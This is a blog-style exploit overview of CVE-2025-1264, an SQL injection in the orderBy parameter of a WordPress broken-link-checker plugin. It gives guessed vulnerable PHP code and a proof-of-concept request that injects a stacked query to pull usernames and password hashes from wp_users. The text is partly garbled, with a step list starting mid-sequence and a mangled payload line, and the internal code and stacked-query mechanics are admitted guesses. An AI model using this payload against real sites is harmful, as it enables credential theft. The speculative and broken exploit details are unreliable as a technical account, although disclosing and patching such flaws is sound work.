CVE-2025-1264 - SQL Injection in Broken Link Checker by AIOSEO – Detailed Exploit Overview

The WordPress plugin "Broken Link Checker by AIOSEO – Easily Fix/Monitor Internal and External links" is hugely popular for helping site owners maintain healthy links. However, a serious vulnerability has been identified: CVE-2025-1264. This flaw allows authenticated users with at least Contributor access to perform SQL Injection attacks via the vulnerable orderBy parameter, exposing sites to data leaks and manipulation.

In this in-depth post, we’ll break down what CVE-2025-1264 means, show you how it works, demonstrate a sample proof of concept (PoC), and share what you need to do to stay protected.

How the Vulnerability Works

This plugin's backend fails to properly validate user input coming from the orderBy parameter. The value is sent directly into an SQL query, likely resembling:

$orderBy = $_GET['orderBy'];
$sql = "SELECT * FROM {$wpdb->prefix}blc_links ORDER BY $orderBy";
$results = $wpdb->get_results($sql);

Problem:
The $orderBy variable is not sanitized or parameterized. An attacker can pass crafted input into orderBy and alter the SQL logic, causing the database to execute malicious SQL queries.

Proof-of-Concept (PoC) Exploit

Note: You must have Contributor or higher access to exploit this vulnerability. By manipulating admin-ajax.php or corresponding endpoint—usually via a GET request—attackers can inject SQL code. Here’s an example:

Request Example

GET /wp-admin/admin-ajax.php?action=get_links&orderBy=id DESC;SELECT user_login,user_pass FROM wp_users-- -
Host: vulnerable-site.com
Cookie: wordpress_logged_in_xxxxxx

Suppose the original intended request looks like

?action=get_links&orderBy=url

An attacker can inject SQL

?action=get_links&orderBy=id DESC; SELECT user_login, user_pass FROM wp_users--

This can make the SQL engine process a second query or return data from the users table, depending on SQL mode and plugin logic.

Example Code: How It Might Look Internally

// Vulnerable code sample
$orderBy = $_GET['orderBy']; // No sanitization!
$query = "SELECT * FROM {$wpdb->prefix}blc_links ORDER BY $orderBy";
$results = $wpdb->get_results($query);
// Attackers supply malicious input in $_GET['orderBy']

If a Contributor triggers this request with a parameter like

?id DESC; SELECT user_login, user_pass FROM wp_users--

The SQL becomes

SELECT * FROM wp_blc_links ORDER BY id DESC; SELECT user_login, user_pass FROM wp_users--

Depending on the environment, this can leak sensitive user credentials.

Crafts request to the plugin endpoint with a malicious orderBy parameter.

3. Executes the request and receives sensitive data from the WordPress database, such as usernames and password hashes.

SQL Query Hardening:

Always validate and whitelist parameters before including them in SQL queries. Use parameterized/prepared statements.

References

- Official Plugin Page
- Wordfence Vulnerability Entry for CVE-2025-1264
- CVE Details for CVE-2025-1264
- Securing WordPress Against SQL Injection

Final Thoughts

SQL Injection remains a devastating and common web vulnerability. CVE-2025-1264 in Broken Link Checker by AIOSEO highlights what can happen when user inputs aren’t properly sanitized. Even trusted contributors can become attackers—make sure your plugins are always up to date, and never trust client-supplied parameters.

If this vulnerability affects you, update immediately: don’t wait until attack bots find your site!

Timeline

Published on: 04/06/2025 05:15:15 UTC
Last modified on: 04/07/2025 14:17:50 UTC